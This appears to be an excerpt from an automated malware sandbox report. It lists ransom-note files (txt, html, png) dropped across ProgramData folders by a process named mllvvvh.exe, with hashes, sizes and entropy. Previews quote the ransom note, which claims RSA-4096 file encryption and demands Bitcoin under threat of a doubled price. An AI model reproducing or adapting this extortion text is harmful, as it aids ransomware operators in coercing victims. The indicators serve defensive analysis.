                  C:\ProgramData\Microsoft\MF\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\MF\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  C:\ProgramData\Microsoft\MapData\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  C:\ProgramData\Microsoft\MapData\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\MapData\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\NetFramework\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\NetFramework\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\NetFramework\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Network\Connections\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Network\Connections\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Network\Connections\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Network\Downloader\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Network\Downloader\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Network\Downloader\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Network\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Network\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Network\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\OFFICE\Heartbeat\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\OFFICE\Heartbeat\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\OFFICE\Heartbeat\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
